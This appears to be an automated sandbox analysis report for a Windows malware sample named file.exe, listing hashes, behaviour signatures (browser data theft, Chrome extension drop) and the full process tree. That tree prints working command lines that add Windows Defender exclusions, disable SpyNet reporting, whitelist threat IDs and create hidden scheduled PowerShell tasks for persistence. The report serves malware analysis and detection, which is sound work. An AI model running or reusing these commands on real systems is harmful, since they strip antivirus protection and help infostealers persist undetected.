Analysis

  • max time kernel
    123s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/01/2023, 22:39

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    f0b78918d085349b9c8285ad3bdea2c8

  • SHA1

    6403331fd52ab1e9774b904f36d21fd6161cc4e6

  • SHA256

    449d7caa1e549bc237a700fe7cb16320b4f88de49c006b29047f203aed4f9339

  • SHA512

    6fde3ed16a6cc8e42cf95d259072f03820513006cb88925f6a44156e28ee1253c75eb18d56976379bd5e45378be1fcf14306367a68f1c13dfaad8f56e06a8568

  • SSDEEP

    196608:91OwNGhOc916VWk6b5D8EYi0Qc8s0cyDQvXqtJNElQLVrQgDt1w2YGRak:3OwC16418Wre1ycv69DtyIak

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4964
    • C:\Users\Admin\AppData\Local\Temp\7zSC529.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4920
      • C:\Users\Admin\AppData\Local\Temp\7zSC894.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4588
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1660
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3100
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:408
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1768
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2732
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4376
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4492
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gPvJRwrmC" /SC once /ST 12:58:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1820
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gPvJRwrmC"
                  4⤵
                    PID:1216
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gPvJRwrmC"
                    4⤵
                      PID:3000
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "boqjQyEgeBagneJBps" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\FBHxIoY.exe\" JW /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:2568
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4088
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2888
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:3104
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1360
                      • C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\FBHxIoY.exe
                        C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\FBHxIoY.exe JW /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:2308
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3916
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1288
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:1584
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:372
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:2356
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:3820
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1416
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4396
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:3148
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:4824
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1448
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:1512
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2700
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1692
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:3100
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:4092
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3208
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1912
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:1556
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:2720
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1444
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3664
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:2692
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4588
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:4520
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4080
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjvgkLgoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjvgkLgoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ETlMoSXAKBfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ETlMoSXAKBfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jtlBjnUcyHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jtlBjnUcyHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lkHAEDYevLoxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lkHAEDYevLoxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EgLUknTySUlyFxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EgLUknTySUlyFxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UEaXSoKYgiRfepGU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UEaXSoKYgiRfepGU\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3804
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:4528
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:392
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1800
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:1068
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:684
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:4012
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4516
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:3660
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:4324
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:3976
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4532
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\EgLUknTySUlyFxVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:1476
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\EgLUknTySUlyFxVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3984
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4288
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4512
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UEaXSoKYgiRfepGU /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4204
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UEaXSoKYgiRfepGU /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:816
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gxsxvOvEM" /SC once /ST 13:17:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:900
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gxsxvOvEM"
                                                                                                            2⤵
